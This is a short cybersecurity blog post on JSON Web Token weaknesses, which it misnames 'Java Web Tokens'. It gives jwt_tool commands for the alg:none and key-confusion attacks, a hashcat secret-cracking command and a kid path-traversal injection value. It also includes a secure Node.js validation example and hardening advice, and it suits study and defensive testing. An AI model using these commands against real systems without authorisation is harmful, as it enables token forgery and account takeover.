Hacking Java Web Tokens (JWT): A Must Read

By /

Listen to this Post

Java Web Tokens (JWT) are widely used for authentication and data exchange in web applications. Understanding their vulnerabilities is crucial for cybersecurity professionals. Below is a detailed breakdown of JWT security, along with practical commands and techniques.

What is JWT?

JWT (JSON Web Token) is a compact, URL-safe means of representing claims between two parties. It consists of three parts:
– Header (algorithm & token type)
– Payload (claims/data)
– Signature (verification)

Example JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Common JWT Attacks & Exploits

1. None Algorithm Attack

  • Some libraries accept tokens with alg: none, allowing unsigned tokens.
  • Exploit Command:
    jwt_tool <JWT> -X a

2. Weak Secret (Brute Force)

  • Crack JWT secrets using tools like hashcat.
  • Command:
    hashcat -m 16500 -a 0 jwt.txt rockyou.txt

3. Key Confusion Attack

  • Trick the server into verifying with a public key when expecting HMAC.
  • Exploit:
    jwt_tool <JWT> -X k -pk public_key.pem

4. Header Injection (CVE-2015-9235)

  • Inject `”kid”: “../../dev/null”` to bypass validation.

You Should Know:

1. Decoding & Modifying JWTs

Use `jq` and `base64` to decode:

echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d | jq

2. Testing JWT Vulnerabilities

  • Using jwt_tool:
    python3 jwt_tool.py <JWT> -T

3. Secure JWT Validation in Node.js

const jwt = require('jsonwebtoken'); 
jwt.verify(token, secretKey, { algorithms: ['HS256'] }, (err, decoded) => { 
if (err) throw err; 
console.log(decoded); 
});

4. Linux Command to Check JWT Expiry

echo $JWT | cut -d '.' -f 2 | base64 -d | jq '.exp'

What Undercode Say

JWT security is critical in modern web apps. Always:
– Use strong secrets (openssl rand -hex 32).
– Restrict algorithms (HS256, RS256).
– Set short expiration times.
– Validate iss, aud, and `sub` claims.

Expected Output:

A secure JWT implementation prevents unauthorized access. Test tokens thoroughly before deployment.

Further Reading:

References:

Reported By: Activity 7313512221039296512 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: